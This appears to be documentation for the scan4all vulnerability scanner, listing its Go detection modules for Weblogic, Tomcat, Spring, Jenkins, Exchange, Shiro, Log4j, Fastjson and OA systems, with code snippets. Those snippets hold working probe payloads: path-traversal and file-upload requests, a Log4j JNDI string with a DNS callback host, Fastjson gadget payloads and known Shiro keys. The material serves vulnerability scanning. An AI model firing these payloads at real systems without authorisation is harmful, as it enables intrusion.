Documentation Index Fetch the complete documentation index at: https://mintlify.com/GhostTroops/scan4all/llms.txt
Use this file to discover all available pages before exploring further.
Overview scan4all includes native Go POC modules for detecting critical vulnerabilities in enterprise applications. These POCs are compiled into the binary for maximum performance and reliability.
High Performance Native Go code executes faster than interpreted templates
Critical CVEs Focus on high-impact vulnerabilities requiring immediate attention
Enterprise Targets Weblogic, Jenkins, Exchange, VMware, and more
Custom Logic Complex detection logic not possible in YAML
Supported Systems Enterprise Middleware Oracle Weblogic
Apache Tomcat
Spring Framework
Jenkins
Weblogic Vulnerabilities (11 POCs) CVE Severity Description CVE-2014-4210 Medium SSRF vulnerability CVE-2017-3506 Critical WLS-WSAT RCE CVE-2017-10271 Critical WLS-WSAT deserialization RCE CVE-2018-2894 High Arbitrary file upload CVE-2019-2725 Critical WLS9-ASYNC deserialization RCE CVE-2019-2729 Critical WLS9-ASYNC deserialization RCE CVE-2020-2883 Critical IIOP/T3 deserialization RCE CVE-2020-14882 Critical Console authentication bypass CVE-2020-14883 Critical Console RCE CVE-2021-2109 High Unauthorized JNDI access
func CVE_2020_14882 ( url string ) bool { path := "/console/css/ %252e%252e%252f console.portal?_nfpb=true&_pageLabel=&handle=a" if req , err := util . HttpRequset ( url + path , "GET" , "" , false , nil ); err == nil { if req . StatusCode == 200 && util . StrContains ( req . Body , "/console/dashboard" ) { util . SendLog ( req . RequestUrl , "CVE-2020-14882" , "Found vuln Weblogic" , "" ) return true } } return false }
Tomcat Vulnerabilities (3 POCs) CVE Type Impact CVE-2017-12615 File Upload PUT method arbitrary file upload CVE-2020-1938 File Read AJP protocol arbitrary file read (Ghostcat) CVE-2020-13935 Auth Bypass WebSocket authentication bypass
Affected Versions :
CVE-2017-12615: 7.0.0 - 7.0.81
CVE-2020-1938: 6.x, 7.x < 7.0.100, 8.x < 8.5.51, 9.x < 9.0.31
func CVE_2017_12615 ( szUrl string ) bool { if req , err := util . HttpRequset ( szUrl + "/vtset.txt" , "PUT" , "test" , false , nil ); err == nil { if req . StatusCode == 204 || req . StatusCode == 201 { util . POClog ( fmt . Sprintf ( "Found vuln Tomcat CVE_2017_12615|-- \" %s /vtest.txt \"\n " , szUrl )) return true } } return false }
Spring Vulnerabilities (2 POCs) CVE Name Description CVE-2022-22965 Spring4Shell RCE via Data Binding on JDK 9+ CVE-2022-22947 Spring Gateway Spring Cloud Gateway 3.x RCE
Spring4Shell Detection :func CVE_2022_22965 ( u string ) bool { if oU , err := url . Parse ( u ); nil == err && oU . Host != "" { szUrl := oU . Scheme + "://" + oU . Host // Test pattern 1: classLoader array access if req , err := util . HttpRequset ( szUrl + "?class.module.classLoader %5b 1 %5d =1" , "GET" , "" , false , nil ); err == nil { if req . StatusCode == 500 { // Confirm with normal access if req2 , err := util . HttpRequset ( szUrl + "?class.module.classLoader=1" , "GET" , "" , false , nil ); err == nil { if req2 . StatusCode == 200 { return true } } } } } return false }
Jenkins Vulnerabilities (4 POCs) CVE Type Description Unauthorized RCE Unauthorized Groovy script execution CVE-2018-1000110 Info Leak User search information disclosure CVE-2018-1000861 RCE Remote code execution ≤ 2.153 CVE-2019-1003000 RCE Groovy script security bypass
Unauthorized Groovy Script :func Unauthorized ( url string ) bool { payload := `println("vulnerable")` if req , err := util . HttpRequset ( url + "/script" , "POST" , "script=" + payload , false , nil ); err == nil { if req . StatusCode == 200 && strings . Contains ( req . Body , "vulnerable" ) { return true } } return false }
POC Directory Structure pocs_go/ ├── Springboot/ # Spring framework POCs │ ├── CVE-2022-22965.go │ └── CVE-2022-22947.go ├── apache/ # Apache software POCs │ ├── CVE-2020-13935.go │ └── poc-go-zookeeper-unauth.go ├── confluence/ # Atlassian Confluence │ ├── CVE_2021_26084.go │ ├── CVE-2021-26085.go │ ├── CVE_2022_26134.go │ └── CVE_2022_26138.go ├── f5/ # F5 BIG-IP │ ├── CVE_2020_5902.go │ ├── CVE_2021_22986.go │ └── CVE_2022_1388.go ├── fastjson/ # Fastjson RCE │ ├── check.go │ └── payloads.go ├── gitlab/ # GitLab │ └── CVE_2021_22205.go ├── jboss/ # JBoss │ └── CVE_2017_12149.go ├── jenkins/ # Jenkins CI │ ├── Unauthorized.go │ ├── CVE_2018_1000110.go │ ├── CVE_2018_1000861.go │ └── CVE_2019_10003000.go ├── log4j/ # Log4Shell │ ├── check.go │ └── payloads.go ├── ms/ # Microsoft products │ ├── exchange/ # Exchange Server │ ├── CVE_2021_26855.go │ ├── CVE_2018_14847.go (MikroTik) │ └── CVE-2020-0796.go (SMBGhost) ├── phpunit/ # PHPUnit │ └── CVE_2017_9841.go ├── shiro/ # Apache Shiro │ ├── CVE_2016_4437.go │ └── dicts/ # Key dictionaries ├── seeyon/ # Seeyon OA (10 POCs) ├── ThinkPHP/ # ThinkPHP │ └── check.go ├── tomcat/ # Apache Tomcat │ ├── CVE_2017_12615.go │ └── CVE_2020_1938.go ├── VMware/ # VMware products │ └── vCenter/ ├── weblogic/ # Oracle Weblogic (11 POCs) └── go_poc_check.go # Main dispatcher
Detection Workflow Execution Logic func POCcheck ( wappalyzertechnologies [] string , URL string , finalURL string , checklog4j bool ) [] string { var technologies [] string for tech := range wappalyzertechnologies { caseStr := strings . ToLower ( wappalyzertechnologies [ tech ]) switch caseStr { case "apache tomcat" : if tomcat . CVE_2020_1938 ( HOST ) { technologies = append ( technologies , "exp-Tomcat|CVE-2020-1938" ) } if tomcat . CVE_2017_12615 ( URL ) { technologies = append ( technologies , "exp-Tomcat|CVE-2017-12615" ) } case "weblogic" : if weblogic . CVE_2020_14882 ( URL ) { technologies = append ( technologies , "exp-Weblogic|CVE_2020_14882" ) } // ... more checks case "shiro" : key := shiro . CVE_2016_4437 ( finalURL ) if key != "" { technologies = append ( technologies , fmt . Sprintf ( "exp-Shiro|key: %s " , key )) } } } return technologies }
Flow Diagram Special Detection Categories
Comprehensive Log4j JNDI injection detection: Features :
Multiple payload variations
Header injection testing (X-Forwarded-For, User-Agent, etc.)
POST parameter injection
Struts2 specific patterns
DNS callback verification
Injection Points :headers := map [ string ] string { "User-Agent" : payload , "X-Api-Version" : payload , "X-Forwarded-For" : payload , "X-Client-IP" : payload , "X-Remote-IP" : payload , "X-Real-IP" : payload , "Referer" : payload , "Cookie" : "JSESSIONID=" + payload , "Contact" : payload , "Token" : payload , }
Callback Detection :uri := randomstr + "." + host + "." + util . CeyeDomain payload := "${jndi:ldap://" + uri + "}" // Send payloads... if util . Dnslogchek ( randomstr ) { util . SendLog ( finalURL , "log4j" , "Found vuln Log4J JNDI RCE" , "" ) return true }
Multiple Fastjson versions and bypass techniques: Detected Versions :
1.2.24 and earlier
1.2.47 and earlier
1.2.62 and earlier
1.2.66 and earlier
Payloads :payloads := [] string { `{"@type":"java.net.Inet4Address","val":"` + dnslog + `"}` , `{"@type":"java.net.Inet6Address","val":"` + dnslog + `"}` , `{"@type":"java.net.InetSocketAddress"...}` , `{"@type":"com.sun.rowset.JdbcRowSetImpl"...}` , }
ProxyLogon/ProxyShell detection: CVE-2021-26855 (ProxyLogon) :func CheckCVE_2021_26855 ( host string ) string { url := "https://" + host + "/owa/auth/x.js" headers := map [ string ] string { "Cookie" : "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3;" , } if req , err := util . HttpRequset ( url , "GET" , "" , false , headers ); err == nil { if req . StatusCode == 200 { return "Found CVE-2021-26855 ProxyLogon" } } return "" }
Shiro deserialization with key detection: Key Dictionary :// Built-in key dictionary in shiro/dicts/ keys := [] string { "kPH+bIxk5D2deZiIxcaaaA==" , "4AvVhmFLUs0KTA3Kprsdag==" , "Z3VucwAAAAAAAAAAAAAAAA==" , // ... 100+ keys }
Detection :func CVE_2016_4437 ( url string ) string { for _ , key := range keys { cookie := generateRememberMeCookie ( key ) if testShiroCookie ( url , cookie ) { return key } } return "" }
OA System Coverage Chinese OA Systems Seeyon (致远OA)
Tongda (通达OA)
Other OA
10 Vulnerability POCs :POC Type SeeyonFastjson RCE SessionUpload File Upload CNVD-2019-19299 File Upload CNVD-2020-62422 File Read CNVD-2021-01627 SQL Injection CreateMysql SQL Injection DownExcelBeanServlet Info Leak GetSessionList Session Disclosure InitDataAssess Auth Bypass ManagementStatus Info Leak
3 Vulnerability POCs :
Get_user_session: User session disclosure
File_delete: Arbitrary file deletion
File_upload: Arbitrary file upload
Landray (蓝凌OA) : RCE vulnerabilityZentao (禅道) : CNVD-2022-42853MCMS (铭飞) : SQL injection Network Protocol Checks
SMB :
MS17-010 detection (EternalBlue)
SMBGhost (CVE-2020-0796)
DCOM :
Port 135 interface enumeration
Remote interface discovery
NetBIOS :
NetBIOS enumeration
Workstation information
Unauthorized access detection: func ZookeeperUnauthority ( url string ) bool { conn , err := net . Dial ( "tcp" , url ) if err != nil { return false } defer conn . Close () // Send stat command conn . Write ([] byte ( "stat \n " )) // Read response buf := make ([] byte , 1024 ) n , _ := conn . Read ( buf ) if strings . Contains ( string ( buf [: n ]), "Zookeeper version" ) { return true } return false }
Configuration Automatic Execution Go POCs execute automatically when matching fingerprints are detected:
# No special configuration needed ./scan4all -host target.com
Enable Log4j Scanning # Log4j requires DNS callback configuration export ceyeapi = "your-api-key" export ceyedomain = "your.ceye.io" ./scan4all -host target.com
Filter by Technology // Internal fingerprint matching if fingerprint . Contains ( "Apache Tomcat" ) { // Execute Tomcat POCs }
Native Speed Compiled Go code executes 10-100x faster than interpreted templates
Low Overhead Minimal memory footprint and CPU usage
Concurrent Execution Multiple POCs run in parallel per target
Early Detection Critical vulns detected first in scan workflow
http://target.com [200] [Oracle Weblogic] [exp-Weblogic | CVE_2020_14882] [http://target.com/console] http://target.com [200] [Apache Shiro] [exp-Shiro | key:Z3VucwAAAAAAAAAAAAAAAA == ] [http://target.com] http://target.com [200] [Apache Tomcat] [exp-Tomcat | CVE-2020-1938] [http://target.com]
Format : URL [Status] [Technology] [Vulnerability|Details] [Final URL]Development See Custom POCs for detailed information on creating Go POC modules.
Quick Example package myservice import ( " github.com/GhostTroops/scan4all/lib/util " ) func CVE_XXXX_XXXXX ( url string ) bool { // Build exploit URL exploitPath := "/vulnerable/endpoint?param=payload" // Send request if req , err := util . HttpRequset ( url + exploitPath , "GET" , "" , false , nil ); err == nil { // Check for vulnerability indicators if req . StatusCode == 200 && util . StrContains ( req . Body , "vulnerable_marker" ) { util . SendLog ( url , "CVE-XXXX-XXXXX" , "Vulnerability found" , "" ) return true } } return false }
Best Practices
Specific Detection Use precise vulnerability markers to avoid false positives
Error Handling Always handle network errors gracefully
Logging Report findings with sufficient context
Performance Keep POCs fast - they run on every matching target
Custom POCs Learn to develop your own Go POC modules
Xray POCs YAML-based POC system
Fingerprinting Technology detection system
Development Guide Extend scan4all capabilities